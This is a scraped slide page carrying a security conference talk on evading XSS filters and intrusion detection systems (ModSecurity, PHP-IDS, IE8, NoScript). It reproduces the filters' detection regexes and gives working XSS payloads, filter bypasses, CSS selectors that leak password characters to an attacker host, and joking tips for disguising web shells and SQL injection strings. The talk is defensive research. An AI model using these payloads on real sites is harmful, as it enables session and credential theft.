in Spring '09
Definitely does not work for YU
WAN MEI http://www.yuwanmei.com/
Working doing sec R&D
- Главная
- Разное
- Бизнес и предпринимательство
- Образование
- Развлечения
- Государство
- Спорт
- Графика
- Культурология
- Еда и кулинария
- Лингвистика
- Религиоведение
- Черчение
- Физкультура
- ИЗО
- Психология
- Социология
- Английский язык
- Астрономия
- Алгебра
- Биология
- География
- Геометрия
- Детские презентации
- Информатика
- История
- Литература
- Маркетинг
- Математика
- Медицина
- Менеджмент
- Музыка
- МХК
- Немецкий язык
- ОБЖ
- Обществознание
- Окружающий мир
- Педагогика
- Русский язык
- Технология
- Физика
- Философия
- Химия
- Шаблоны, картинки для презентаций
- Экология
- Экономика
- Юриспруденция
Что такое findslide.org?
FindSlide.org - это сайт презентаций, докладов, шаблонов в формате PowerPoint.
Обратная связь
Email: Нажмите что бы посмотреть
Презентация на тему Our Favorite XSS Filters/IDS and how to Attack Them
Содержание
- 2. About Us
- 3. About UsEduardo Vela (sirdarckcat)http://sirdarckcat.net/http://sirdarckcat.blogspot.com/https://twitter.com/sirdarckcatMoved from .mx to
- 4. About UsDavid Lindsayhttp://p42.us/http://www.cigital.com/https://twitter.com/thornmakerDefinitely does work for Cigital
- 5. The Basicsmilk before meat?
- 6. XSS BasicsAttacker controls dynamic content in HTTP response, e.g. HTML, CSS, JavaScript, etcClassic examples:">alert(0)">">
- 7. The Cheat Sheet – http://ha.ckers.org/xss.html - Robert
- 8. Filter BasicsDangerous?yesnoUNTRUSTEDAPPLICATION
- 9. Sits between browser and the server (or at one of the endpoints).Filter BasicsBrowser Servermod_securityPHP-IDSImperva
- 10. We're not looking at sanitization methods/functions. We
- 11. Evasion Techniqueshope you liked the milk
- 12. No white space, can use / or nothing at all after quoted attributesHTML Tricks
- 13. Round about way to assign the src
- 14. Few know of isindex tagKudos to Gareth Heyes for theseHTML Tricks
- 15. src = this.src, alt = this.altHTML Tricks
- 16. alert('xss');Content served as text/xml and text/xml-xhtml can
- 17. location='javascript:alert(0)';location=name; Short, no parenthesis for secondVictim is
- 18. location=location.hash.slice(1); //avoid the #location=location.hash //FF onlyPayload
- 19. alert(document.cookie)alert(document['cookie'])with(document)alert(cookie)These are all equivalentJavaScript Tricks
- 20. eval(document.referrer.slice(10));When attacker controls referrer pageeval(0+location.string) //or
- 21. x setter=eval,x=1Execute arbitrary code without quotes or parenthesisFF onlyThis notation has been deprecated for years...JavaScript Tricks
- 22. http://site.com/?p=";eval(unescape(location))//# %0Aalert(0)http: JavaScript label// single line comment%0A newline, needs to be unescapedJavaScript Tricks
- 23. ""+{toString:alert} ""+{valueOf:alert}Executes function without using () or =Works in IE and OperaThis shouldn't work...JavaScript Tricks
- 24. (É=[Å=[],µ=!Å+Å][µ[È=-~-~++Å]+({}+Å) [Ç=!!Å+µ,ª=Ç[Å]+Ç[+!Å],Å]+ª])() [µ[Å]+µ[Å+Å]+Ç[È]+ª](Å)($=[$=[]][(__=!$+$)[_=-~-~-~$]+({}+$)[_/_]+($$=($_=!''+$)[_/_]+$_[+$])])()[__[_/_]+__[_+~$]+$_[_]+$$](_/_)what, you don't see the
- 25. testIE onlyvbscript in event handlersVBScript Tricks
- 26. eval+namejust like eval(name) in JavaScriptVBScript Tricks
- 27. HTML5 will allow attributes in closing tagsFuture Tricks?
- 28. input[name=password][value*=a]{ background:url('//attacker?log[]=a');}HTML5 includes "seamless" iframescould allow for pure css-based XSS attacksFuture Tricks?
- 29. data:text/html,alert(0)data:text/html;base64, PHNjcmlwdD5hbGVydCgwKTwvc2NyaXB0Pg==supported by all modern browsers except IE (congrats to IE team )Other Tricks
- 30. ?injection=alert(1)>HPP - HTTP Paramater PollutionVariations of this
- 31. var m=link // XML inside JSXML inside JavaScript{alert('xss')}JavaScript inside XML evaluated as JavaScriptOther Tricks
- 32. Unicode and XSSOnly Mozilla’s 5 thousand lines of code implementation appears to be safe (maybe).
- 33. Java’s Modified UnicodeUnicode.... 1.0….. 2.0…… 3.0...3.1….. 4.0…… 5.0….Modified Unicode
- 34. Unicode Quick Intro0xxx xxxx -> ASCII1xxx xxxx
- 35. Overlong UTFWays to represent the “less than” char
- 36. PHPunsigned short c;// 16 bits... if (c
- 37. Eating charsö == \x90 (also works with
- 38. Introducing The FiltersPHP-IDSMod_SecurityIE8NoScript
- 39. ModSecurityhttp://modsecurity.org/
- 40. Open Sourceeasy to install Apache moduleModSecurity Advantages
- 41. filters are ineffectiveInfrequently updatedNo support for different encodings ModSecurity Disadvantages
- 42. Most of the XSS filtering occurs in
- 43. Second phase – must match this regular expression:(?:\b(?:(?:type\b\W*?\b(?:text\b\W*?\b(?:j(?:ava)?|ecma|vb)|application\b\W*?\bx-(?:java|vb))script|c(?:opyparentfolder|reatetextrange)|get(?:special|parent)folder|iframe\b.{0,100}?\bsrc)\b|on(?:(?:mo(?:use(?:o(?:ver|ut)|down|move|up)|ve)|key(?:press|down|up)|c(?:hange|lick)|s(?:elec|ubmi)t|(?:un)?load|dragdrop|resize|focus|blur)\b\W*?=|abort\b)|(?:l(?:owsrc\b\W*?\b(?:(?:java|vb)script|shell|http)|ivescript)|(?:href|url)\b\W*?\b(?:(?:java|vb)script|shell)|background-image|mocha):|s(?:(?:tyle\b\W*=.*\bexpression\b\W*|ettimeout\b\W*?)\(|rc\b\W*?\b(?:(?:java|vb)script|shell|http):)|a(?:ctivexobject\b|lert\b\W*?\(|sfunction:))|
- 44. The filter will catch:but miss:andandModSecurity
- 45. The filter will catch:";document.write('');"but miss:";document.write('');"ModSecurity
- 46. Good for novices to practice againstOther types
- 47. http://www.owasp.org/index.php/Category:OWASP_ModSecurity_Core_Rule_Set_ProjectWould be a good place to start, except:ModSecurity
- 48. PHP-IDShttp://php-ids.org/
- 49. Attempts to detect all attacks (not just
- 50. Sometimes false positives PHP-dependant ("ported" to typo3, Drupal, perl)CPU consumptionPHP-IDS Disadvantages
- 51. Developed by Mario Heiderich along with Christian
- 52. (?:,\s*(?:alert|showmodaldialog|eval)\s*,)|(?::\s*eval\s*[^\s])|([^:\s\w,.\/?+-]\s*)?(?Filter ExamplesFilters are very targetedHas 68 filters
- 53. PHP-IDS Developing a Bypasseval(name)Injection Found! Overall Impact: 17
- 54. PHP-IDS Developing a Bypassx=evaly=namex(y)Injection Found! Overall Impact: 12
- 55. PHP-IDS Developing a Bypassx='ev'+'al'x=this[x]y='na'+'me'x(x(y))Injection Found! Overall Impact: 46
- 56. PHP-IDS Developing a Bypass$$='e'x='ev'+'al'x=this[x]y='nam'+$$y=x(y)x(y)Injection Found! Overall Impact: 37
- 57. PHP-IDS Developing a Bypass$$='e'x=$$+'val'z=(1)['__par'+'ent__']x=z[x]y=x('nam'+e)x(y)Injection Found! Overall Impact: 62
- 58. PHP-IDS Developing a Bypass$$='e'__='__par'x=$$+'val'z=(1)[__+'ent__']x=z[x]y=x('nam'+e)x(y)Injection Found! Overall Impact: 27
- 59. PHP-IDS Developing a Bypass$$='e'__='__par'x=$$+'val'x=1+[]z=$$+'nt__'x=x[__+z]x=z[x]y=x('nam'+e)x(y)Injection Found! Overall Impact: 18
- 60. PHP-IDS Developing a Bypass__=''$$=__+'e'__=__+'__par'x=$$+'val'x=1+[]z=$$+'nt__'x=x[__+z]x=z[x]y=x('nam'+e)x(y)Injection Found! Overall Impact: 14
- 61. PHP-IDS Developing a Bypass__=''$$=__+'e'__=__+'__par'_=$$+'val'x=1+[]z=$$+'nt__'x=x[__+z]x=x[_]y=x('nam'+$$)x(y)Injection Found! Overall Impact: 07
- 62. PHP-IDS Developing a Bypass__=''$$=__+'e'__=__+'__par'_=$$+'val'x=1+[]z=$$+'nt__'x=x[__+z]x=x[_]y=x('nam'+$$)x(y)'abc(def)ghi(jkl)mno(pqr)abc(def)ghi 'Injection Found! Overall Impact: 07
- 63. PHP-IDS Developing a Bypass__=''$$=__+'e'__=__+'__par'_=$$+'val'x=1+[]z=$$+'nt__'x=x[__+z]x=x[_]y=x('nam'+$$)x(y) 'abc(def)ghi(jkl)mno(pqr)abc(def)abc(def)...'Nothing suspicious was found!
- 64. PHP-IDS Developing a Bypasshttp://p42.us/phpids/95.htmlThis injection worked on 24.July.2009Will be fixed shortly (used with Mario's permission)
- 65. Other Recent bypasses:testCourtesy of Gareth Heyesthis[[]+('eva')+(/x/,new Array)+'l'](/xxx.xxx.xxx.xxx.xx/+name,new Array)Courtesy of David LindsayPHP-IDS
- 66. -setTimeout( 1E1+ ',aler\ t
- 67. XSS Filterhttp://blogs.technet.com/srd/archive/2008/08/19/ie-8-xss-filter-architecture-implementation.aspxhttp://blogs.msdn.com/dross/archive/2008/07/03/ie8-xss-filter-design-philosophy-in-depth.aspxExamining the IE8 XSS Filter by kuza55 (OWASP Australia)
- 68. It should be compatible.It should be secure.
- 69. If its not compatible, users will turn
- 70. HTTP/1.0 200 OK Cache-Control: private, max-age=0
- 71. The filter will protect against the Top
- 72. The rulesIf you want to see them:C:\>findstr /C:"sc{r}" \WINDOWS\SYSTEM32\mshtml.dll|find "{"{.*?((@[i\\])|(([:=]|(&[#()=]x?0*((58)|(3A)|(61)|(3D));?)).*?([(\\]|(&[#()=]x?0*((40)|(28)|(92)|(5C));?))))}{[ /+\t\"\'`]st{y}le[ /+\t]*?=.*?([:=]|(&[#()=]x?0*((58)|(3A)|(61)|(3D));?)).*?([(\\]|(&[#()=]x?0*((40)|(28)|(92)|(5C));?))}{
- 73. Request?var= Rule matched:{} Response Source Code Final Source CodeThe rules
- 74. We will show the remaining 7 of
- 75. Fragmented ?url='%20x=`&name=`%20onmouseover='alert(1) DOM based /index.php/alert(1)/ document.write(""); Inside event attributes ?id=alert(1)Unfiltered Vectors – Top 4,5,6
- 76. Reflected XSS means that the matched attack
- 77. Attacks that are made to content not
- 78. Using CSS-only attacksinput[type=password][value^=a]{background:"//attacker.com/log.php?hash[]=a";}input[type=password][value^=b]{background:"//attacker.com/log.php?hash[]=b";}…Several XSS attacks are possible
- 81. Intranet Same OriginOther Exceptions
- 82. Allowed by the filter:clickmeSo this wont be
- 83. CRLF Injection:header(“Location: ”.$_GET[‘redir’]);redir=“\nX-XSS-Protection:+0\n\n
- 84. IE8 Blocks JS by disabling:=()BUT It is
- 85. Other possible bypasses?Require a certain context. new voteForObama;
- 86. Disabling scriptsOriginal code:if(top!=self)top.location=locationRequest:?foobar=ifAfter filter:if(top!=self)top.location=locationDemo! With.. Any webpageAttacking with the XSS Filter
- 87. Attacking content-aware filtersOriginal code: continueURI=“/login2.jsp?friend=”; Request:?foobar=continueURIAfter filter: continueURI=“/login2.jsp?friend=”; Attacking with the XSS Filter
- 88. Why don't you detect fragmented attacks? Performance,
- 89. Why don't you detect attacks to Intranet?
- 90. Firefox -> Never! They have CSP and
- 91. NoScripthttp://noscript.net/
- 92. NoScript AdvantagesTheir users.Security over usability (still very usable!).Updates every week/2 weeks.Is NOT just a XSS filter.
- 93. As any other filter, it's still possible
- 94. find a bypass 10 minutes before the
- 95. The DoS and pwn on NoScript (for
- 96. NoScript wont protect websites from attacking themselves,
- 97. Tribute to the stupid IDSThanks to pretty much every other WAF vendor out there...
- 98. Follow this simple rules and a lot
- 99. Stop using alert('xss').You should now use prompt('xss').Rule Number 1
- 100. Dont do .Do
- 101. For blind SQL injections.Stop using ' or 1=1--.Use ' or 2=2--.Rule Number 3
- 102. For SQL injections.Stop using UNION SELECT.Use UNION ALL SELECT.Rule Number 4
- 103. Don’t do /etc/passwd.Do /foo/../etc/bar/../passwd.Rule Number 5
- 104. Don’t use http://yourhost.com/r57.txtUse https://yourhost.com/lol.txtRule Number 6
- 105. Don’t call your webshell c99.php, shell.aspx or cmd.jspCall it rofl.php.Rule Number 7
- 106. For Internet Explorer, use IE-8, and enable
- 107. Thanks goes to many for helping us
- 108. Скачать презентацию
- 109. Похожие презентации
About Us
alert(0)">">">
![alert(document.cookie)alert(document['cookie'])with(document)alert(cookie)These are all equivalentJavaScript Tricks](/img/tmb/15/1419283/cc1ef61414e6764cbc9521040a0cea50-720x.jpg "Our Favorite XSS Filters/IDS and how to Attack Them")
![(É=[Å=[],µ=!Å+Å][µ[È=-~-~++Å]+({}+Å) [Ç=!!Å+µ,ª=Ç[Å]+Ç[+!Å],Å]+ª])() [µ[Å]+µ[Å+Å]+Ç[È]+ª](Å)($=[$=[]][(__=!$+$)[_=-~-~-~$]+({}+$)[_/_]+($$=($_=!''+$)[_/_]+$_[+$])])()[__[_/_]+__[_+~$]+$_[_]+$$](_/_)what, you don't see the alert(1) in there?no alphanumeric characters,](/img/tmb/15/1419283/2990903c75cf57ed19342d00d41b2e39-720x.jpg "Our Favorite XSS Filters/IDS and how to Attack Them")
![input[name=password][value*=a]{ background:url('//attacker?log[]=a');}HTML5 includes](/img/tmb/15/1419283/f1debc2af5d4ca47857d171170166356-720x.jpg "Our Favorite XSS Filters/IDS and how to Attack Them")
![(?:,\s*(?:alert|showmodaldialog|eval)\s*,)|(?::\s*eval\s*[^\s])|([^:\s\w,.\/?+-]\s*)?(?Filter ExamplesFilters are very targetedHas 68 filters in addition to the one](/img/tmb/15/1419283/697be5a5be4e49f5221cf370d843ff25-720x.jpg "Our Favorite XSS Filters/IDS and how to Attack Them")
![PHP-IDS Developing a Bypassx='ev'+'al'x=this[x]y='na'+'me'x(x(y))Injection Found! Overall Impact: 46](/img/tmb/15/1419283/92bbf0af1d5a7b1ebe02c8fcd3a09a43-720x.jpg "Our Favorite XSS Filters/IDS and how to Attack Them")
![PHP-IDS Developing a Bypass$$='e'x='ev'+'al'x=this[x]y='nam'+$$y=x(y)x(y)Injection Found! Overall Impact: 37](/img/tmb/15/1419283/3f2dbf6aa25acad4ad3e1f9673969fe3-720x.jpg "Our Favorite XSS Filters/IDS and how to Attack Them")
![PHP-IDS Developing a Bypass$$='e'x=$$+'val'z=(1)['__par'+'ent__']x=z[x]y=x('nam'+e)x(y)Injection Found! Overall Impact: 62](/img/tmb/15/1419283/cf788b5fb62bdf4d9487616835b96663-720x.jpg "Our Favorite XSS Filters/IDS and how to Attack Them")
![PHP-IDS Developing a Bypass$$='e'__='__par'x=$$+'val'z=(1)[__+'ent__']x=z[x]y=x('nam'+e)x(y)Injection Found! Overall Impact: 27](/img/tmb/15/1419283/465169540910d594cfa60aaa65e5b8b1-720x.jpg "Our Favorite XSS Filters/IDS and how to Attack Them")
![PHP-IDS Developing a Bypass$$='e'__='__par'x=$$+'val'x=1+[]z=$$+'nt__'x=x[__+z]x=z[x]y=x('nam'+e)x(y)Injection Found! Overall Impact: 18](/img/tmb/15/1419283/e7e6f1b8cbb00daf63697451c9a04636-720x.jpg "Our Favorite XSS Filters/IDS and how to Attack Them")
![PHP-IDS Developing a Bypass__=''$$=__+'e'__=__+'__par'x=$$+'val'x=1+[]z=$$+'nt__'x=x[__+z]x=z[x]y=x('nam'+e)x(y)Injection Found! Overall Impact: 14](/img/tmb/15/1419283/607b66894f04d8a0e90aeb24c82a55aa-720x.jpg "Our Favorite XSS Filters/IDS and how to Attack Them")
![PHP-IDS Developing a Bypass__=''$$=__+'e'__=__+'__par'_=$$+'val'x=1+[]z=$$+'nt__'x=x[__+z]x=x[_]y=x('nam'+$$)x(y)Injection Found! Overall Impact: 07](/img/tmb/15/1419283/dfa0800698305be43b9391fc9b75cec9-720x.jpg "Our Favorite XSS Filters/IDS and how to Attack Them")
![PHP-IDS Developing a Bypass__=''$$=__+'e'__=__+'__par'_=$$+'val'x=1+[]z=$$+'nt__'x=x[__+z]x=x[_]y=x('nam'+$$)x(y)'abc(def)ghi(jkl)mno(pqr)abc(def)ghi 'Injection Found! Overall Impact: 07](/img/tmb/15/1419283/3628560d190fd21c921b9c1b71ef8f09-720x.jpg "Our Favorite XSS Filters/IDS and how to Attack Them")
![PHP-IDS Developing a Bypass__=''$$=__+'e'__=__+'__par'_=$$+'val'x=1+[]z=$$+'nt__'x=x[__+z]x=x[_]y=x('nam'+$$)x(y) 'abc(def)ghi(jkl)mno(pqr)abc(def)abc(def)...'Nothing suspicious was found!](/img/tmb/15/1419283/557716f57a8b0665fe813c503c6fecaa-720x.jpg "Our Favorite XSS Filters/IDS and how to Attack Them")
![Other Recent bypasses:testCourtesy of Gareth Heyesthis[[]+('eva')+(/x/,new Array)+'l'](/xxx.xxx.xxx.xxx.xx/+name,new Array)Courtesy of David LindsayPHP-IDS](/img/tmb/15/1419283/3a3ba993fa6a6b303247b6550608a608-720x.jpg "Our Favorite XSS Filters/IDS and how to Attack Them")
![Using CSS-only attacksinput[type=password][value^=a]{background:](/img/tmb/15/1419283/4b3406b997bb96be3943e664340ce7c2-720x.jpg "Our Favorite XSS Filters/IDS and how to Attack Them")
![CRLF Injection:header(“Location: ”.$_GET[‘redir’]);redir=“\nX-XSS-Protection:+0\n\n](/img/tmb/15/1419283/64308237cadc91f6efc84b834a3a70cf-720x.jpg "Our Favorite XSS Filters/IDS and how to Attack Them")
Слайд 3
About Us
Eduardo Vela (sirdarckcat)
http://sirdarckcat.net/
http://sirdarckcat.blogspot.com/
https://twitter.com/sirdarckcat
Moved from .mx to .cn
in Spring '09
WAN MEI http://www.yuwanmei.com/
Working doing sec R&D
Слайд 4
About Us
David Lindsay
http://p42.us/
http://www.cigital.com/
https://twitter.com/thornmaker
Definitely does work for Cigital and
recently moved to Virginia so that his vote might
actually mean something (as opposed to when he lived in Massachusetts and Utah)
Слайд 6
XSS Basics
Attacker controls dynamic content in HTTP response,
e.g. HTML, CSS, JavaScript, etc
Classic examples:
">alert(0)
">
">
Слайд 7 The Cheat Sheet – http://ha.ckers.org/xss.html - Robert "RSnake"
Hansen
WASC Script Mapping Project - http://projects.webappsec.org/f/ScriptMapping_Release_26Nov2007.html - Romain Gaucher
Obligatory
(but still useful) OWASP reference - http://www.owasp.org/index.php/Cross-Site_Scripting
tra.ckers.org ? any day now... bug rsnake and id :)
XSS Basics – Helpful Resources
Слайд 9 Sits between browser and the server (or at
one of the endpoints).
Filter Basics
Browser
Server
mod_security
PHP-IDS
Imperva
Слайд 10
We're not looking at sanitization methods/functions.
We wont make
any distinction between blocking and detection mode.
If attack focused,
must cover all variations.If vulnerability focused, must cover all variations.
Our Approach
Слайд 13
Round about way to assign
the src paramater
Avoids "src" altogether
Kudos to Alex K.
(kuza55) for these HTML Tricks
Слайд 16
alert('xss');
Content served as text/xml and text/xml-xhtml can
execute JavaScript by using html and xhtml namespaces
XHTML Tricks
Слайд 17
location='javascript:alert(0)';
location=name;
Short, no parenthesis for second
Victim is not
actually redirected anywhere so it can be transparent
name =
window.nameDownside: attacker controlled website must be involved
Downside: persistent XSS is demoted to reflective XSS
JavaScript Tricks
Слайд 18
location=location.hash.slice(1); //avoid the #
location=location.hash //FF only
Payload comes
after hash in URL
Victim website does not see true
payloadNo parenthesis in second one
In FireFox, you can incorporate the hash symbol as a sharp variable, #0={}
http://victim.com/?param=";location=location.hash)//#0={};alert(0)
JavaScript Tricks
Слайд 19
alert(document.cookie)
alert(document['cookie'])
with(document)alert(cookie)
These are all equivalent
JavaScript Tricks
Слайд 20
eval(document.referrer.slice(10));
When attacker controls referrer page
eval(0+location.string) //or 1+location.string
Use
a ternary operator along with fake GET paramaters, e.g.
0?fake1=1/*&id=42&name=";eval(1+location.string);"&lang=EN&fake2=*/:alert(0)
JavaScript
Tricks
Слайд 21
x setter=eval,x=1
Execute arbitrary code without quotes or parenthesis
FF
only
This notation has been deprecated for years...
JavaScript Tricks
Слайд 22
http://site.com/?p=";eval(unescape(location))//# %0Aalert(0)
http: JavaScript label
// single line comment
%0A newline, needs to be
unescaped
JavaScript Tricks
Слайд 23
""+{toString:alert}
""+{valueOf:alert}
Executes function without using () or =
Works
in IE and Opera
This shouldn't work...
JavaScript Tricks
Слайд 24
(É=[Å=[],µ=!Å+Å][µ[È=-~-~++Å]+({}+Å) [Ç=!!Å+µ,ª=Ç[Å]+Ç[+!Å],Å]+ª])() [µ[Å]+µ[Å+Å]+Ç[È]+ª](Å)
($=[$=[]][(__=!$+$)[_=-~-~-~$]+({}+$)[_/_]+($$=($_=!''
+$)[_/_]+$_[+$])])()[__[_/_]+__[_+~$]+$_[_]+$$](_/_)
what, you don't see the alert(1)
in there?
no alphanumeric characters, can execute arbitrary JavaScript
kudos to
Yosuke HasegawaJavaScript Tricks
Слайд 28
input[name=password][value*=a]{
background:url('//attacker?log[]=a');
}
HTML5 includes "seamless" iframes
could allow
for pure css-based XSS attacks
Future Tricks?
Слайд 29
data:text/html,alert(0)
data:text/html;base64, PHNjcmlwdD5hbGVydCgwKTwvc2NyaXB0Pg==
supported by all modern browsers except IE
(congrats to IE team )
Other Tricks
Слайд 30
?injection=alert(1)>
HPP - HTTP Paramater Pollution
Variations of this can
bypass most filters (not IE8)
Underlying server/application must join parameters
somehow (ASP, ASP.NET on IIS)Stefano di Paola and Luca Carettoni recently presented on HPP at OWASP EU09 - paper at http://www.owasp.org/images/b/ba/AppsecEU09_CarettoniDiPaola_v0.8.pdf
Other Tricks
Слайд 31
var m=link
// XML inside JS
XML inside
JavaScript
{alert('xss')}
JavaScript inside XML evaluated as JavaScript
Other Tricks
Слайд 32
Unicode and XSS
Only Mozilla’s 5 thousand lines of
code implementation appears to be safe (maybe).
Слайд 34
Unicode Quick Intro
0xxx xxxx -> ASCII
1xxx xxxx ->
Unicode
110x xxxx 10xx xxxx -> 11 bits char (2
bytes)1110 xxxx 10xx xxxx 10xx xxxx -> 16 bits char (3 bytes)
1111 0xxx 10xx xxxx 10xx xxxx 10xx xxxx -> 21 bits char
Etc..
Слайд 35
Overlong UTF
Ways to represent the “less than” char
exploit:
%C0%BCscript%C0%BEalert(1)%C0%BC/script%C0%BE
%C0%BCscript%C0%BEalert(1)%C0%BC/script%C0%BE
Слайд 36
PHP
unsigned short c;// 16 bits
...
if (c >= 0xf0)
{ /* four bytes encoded, 21 bits */
c = ((s[0]&7)<<18) | ((s[1]&63)<<12) | ((s[2]&63)<<6) | (s[3]&63); s += 4; pos -= 4;“c” is overflowed
Eg: %FF%F0%80%BC
1111 1111 1111 0000 1000 0000 1010 1100
Слайд 37
Eating chars
ö == \x90 (also works
with other chars, but we want to use NOP)
PHP’s
utf8_decode will transform it to:Tip: this also works on all M$ products (IE).. Still thinking your filter is safe?
Слайд 41
filters are ineffective
Infrequently updated
No support for different encodings
ModSecurity Disadvantages
Слайд 42 Most of the XSS filtering occurs in just
one filter
First phase – must match one of these
keywords:@pm jscript onsubmit copyparentfolder javascript meta onmove onkeydown
onchange onkeyup activexobject expression onmouseup ecmascript onmouseover vbsc
ript: s asfunction: onclick .fromcharcode background-image: .cookie ondragdrop onblur
x-javascript mocha: onfocus javascript: getparentfolder lowsrc onresize @import
alert onselect script onmouseout onmousemove background application .execscript
livescript: getspecialfolder vbscript iframe .addimport onunload createtextrange
onload
ModSecurity Filters
Слайд 43
Second phase – must match this regular expression:
(?:\b(?:(?:type\b\W*?\b(?:text\b\W*?\b
(?:j(?:ava)?|ecma|vb)|application\b\W*?\bx-(?:java|vb))script|c(?:opyparentfolde
r|reatetextrange)|get(?:special|parent)folder|iframe\b.{0,100}?\bsrc)\b|on(?:(?:
mo(?:use(?:o(?:ver|ut)|down|move|up)|ve)|key(?:press|down|up)|c(?:hange|lick)|s(
?:elec|ubmi)t|(?:un)?load|dragdrop|resize|focus|blur)\b\W*?=|abort\b)|(?:l(?:ows
rc\b\W*?\b(?:(?:java|vb)script|shell|http)|ivescript)|(?:href|url)\b\W*?\b(?:(?:
java|vb)script|shell)|background-image|mocha):|s(?:(?:tyle\b\W*=.*\bexpression\b
\W*|ettimeout\b\W*?)\(|rc\b\W*?\b(?:(?:java|vb)script|shell|http):)|a(?:ctivexob
ject\b|lert\b\W*?\(|sfunction:))|
?(?:(?:script|meta)\b|iframe)|!\[cdata\[)|(?:\.(?:(?:e
xecscrip|addimpor)t|(?:fromcharcod|cooki)e|innerhtml)|\@import)\b)
ModSecurity Filters
Слайд 46
Good for novices to practice against
Other types of
filters (SQLi, Response Splitting, etc) are just as bad
Has
potential... if filters are strengthenedModSecurity
Слайд 47
http://www.owasp.org/index.php/Category:OWASP_ModSecurity_Core_Rule_Set_Project
Would be a good place to start, except:
ModSecurity
Слайд 49 Attempts to detect all attacks (not just common
attacks).
Easily catches all basic injections
Open source - a
lot of people "hack it" in their "free time"Well maintained - rule-sets are frequently attacked and improved
Codebase supports a lot of encoding algorithms
PHP-IDS Advantages
Слайд 50
Sometimes false positives
PHP-dependant ("ported" to typo3, Drupal,
perl)
CPU consumption
PHP-IDS Disadvantages
Слайд 51 Developed by Mario Heiderich along with Christian Matthies
and Lars H. Strojny
Aggressive blacklist filtering
detects all forms of
XSS imaginable (and more)Each injection is given a score based upon the number of filters triggered
Filters have greatly improved over past 2 years thanks to demo.phpids.org, sla.ckers, and Mario who frequently updates
PHP-IDS
Слайд 52
(?:,\s*(?:alert|showmodaldialog|eval)\s*,)|(?::\s*eval\s*[^\s])|([^:\s\w,.\/?+-]\s*)?(?Filter Examples
Filters are very targeted
Has 68 filters in
addition to the one below (majority are for XSS,
not all)https://svn.phpids.org/svn/trunk/lib/IDS/default_filter.xml
Слайд 55
PHP-IDS Developing a Bypass
x='ev'+'al'
x=this[x]
y='na'+'me'
x(x(y))
Injection Found! Overall Impact: 46
Слайд 56
PHP-IDS Developing a Bypass
$$='e'
x='ev'+'al'
x=this[x]
y='nam'+$$
y=x(y)
x(y)
Injection Found! Overall Impact: 37
Слайд 57
PHP-IDS Developing a Bypass
$$='e'
x=$$+'val'
z=(1)['__par'+'ent__']
x=z[x]
y=x('nam'+e)
x(y)
Injection Found! Overall Impact: 62
Слайд 58
PHP-IDS Developing a Bypass
$$='e'
__='__par'
x=$$+'val'
z=(1)[__+'ent__']
x=z[x]
y=x('nam'+e)
x(y)
Injection Found! Overall Impact: 27
Слайд 59
PHP-IDS Developing a Bypass
$$='e'
__='__par'
x=$$+'val'
x=1+[]
z=$$+'nt__'
x=x[__+z]
x=z[x]
y=x('nam'+e)
x(y)
Injection Found! Overall Impact: 18
Слайд 60
PHP-IDS Developing a Bypass
__=''
$$=__+'e'
__=__+'__par'
x=$$+'val'
x=1+[]
z=$$+'nt__'
x=x[__+z]
x=z[x]
y=x('nam'+e)
x(y)
Injection Found! Overall Impact: 14
Слайд 61
PHP-IDS Developing a Bypass
__=''
$$=__+'e'
__=__+'__par'
_=$$+'val'
x=1+[]
z=$$+'nt__'
x=x[__+z]
x=x[_]
y=x('nam'+$$)
x(y)
Injection Found! Overall Impact: 07
Слайд 62
PHP-IDS Developing a Bypass
__=''
$$=__+'e'
__=__+'__par'
_=$$+'val'
x=1+[]
z=$$+'nt__'
x=x[__+z]
x=x[_]
y=x('nam'+$$)
x(y)
'abc(def)ghi(jkl)mno(pqr)abc(def)ghi '
Injection Found! Overall Impact:
Слайд 63
PHP-IDS Developing a Bypass
__=''
$$=__+'e'
__=__+'__par'
_=$$+'val'
x=1+[]
z=$$+'nt__'
x=x[__+z]
x=x[_]
y=x('nam'+$$)
x(y) 'abc(def)ghi(jkl)mno(pqr)abc(def)abc(def)...'
Nothing suspicious was found!
Слайд 64
PHP-IDS Developing a Bypass
http://p42.us/phpids/95.html
This injection worked on 24.July.2009
Will
be fixed shortly (used with Mario's permission)
Слайд 65
Other Recent bypasses:
test
Courtesy of Gareth Heyes
this[[]+('eva')+(/x/,new Array)+'l'](/xxx.xxx.xxx.xxx.xx/+name,new
Array)
Courtesy of David Lindsay
PHP-IDS
Слайд 66 -setTimeout( 1E1+ ',aler\ t ( /Mario dont go,
its fun phpids rocks/ ) + 1E100000 ' )
Courtesy
of Gareth Heyes (maybe he's a terminator like XSS machine?)alert(1)">hola
Courtesy of Eduardo Vela
PHP-IDS
Слайд 67
XSS Filter
http://blogs.technet.com/srd/archive/2008/08/19/ie-8-xss-filter-architecture-implementation.aspx
http://blogs.msdn.com/dross/archive/2008/07/03/ie8-xss-filter-design-philosophy-in-depth.aspx
Examining the IE8 XSS Filter by kuza55
(OWASP Australia)
Слайд 68
It should be compatible.
It should be secure.
It
should be performant.
The 3 commandments of the IE filter
Слайд 69
If its not compatible, users will turn it
off.
If its not performant, users will turn it off.
Compatibility
> Security > PerformanceСлайд 70 HTTP/1.0 200 OK Cache-Control: private, max-age=0 Date: Sun, 11
Jul 2010 01:23:45 GMT Content-Type: text/html; charset=ISO Set-Cookie: ASDF=123 Server: Apache X-XSS-Protection: 0
If its not compatible, admins will turn it off.
If its not performant, admins will turn it off.
Performance + Compatibility
Слайд 71 The filter will protect against the Top 3
Reflected XSS vectors:
$injection
var a = “$injection”;
What does
this mean?
Слайд 72
The rules
If you want to see them:
C:\>findstr /C:"sc{r}"
\WINDOWS\SYSTEM32\mshtml.dll|find "{"
{.*?((@[i\\])|(([:=]|(&[#()=]x?0*((58)|(3A)|(61)|(3D));?)).*?([(\\]|(&[#()=]x?0*((40)|(28)|(92)|(5C));?))))}
{[ /+\t\"\'`]st{y}le[ /+\t]*?=.*?([:=]|(&[#()=]x?0*((58)|(3A)|(61)|(3D));?)).*?([(\\]|(&[#()=]x?0*((40)|(28)|(92)|(5C));?))}
{
+\t]*?=.}{
{
{<.*[:]vmlf{r}ame.*?[ /+\t]*?src[ /+\t]*=}
{<[i]?f{r}ame.*?[ /+\t]*?src[ /+\t]*=}
{
{
{
{[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).*?(((l|(\\u006C))(o|(\\u006F))(c|(\\u0063))(a|(\\u0061))(t|(\\u0074))(i|(\\u0069))(o|(\\u006F))(n|(\\u006E)))|((n|(\\u006E))(a|(\\u0061))(m|(\\u006D))(e|(\\u0065)))).*?{=}}
{[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).+?(([.].+?)|([\[].*?[\]].*?)){=}}
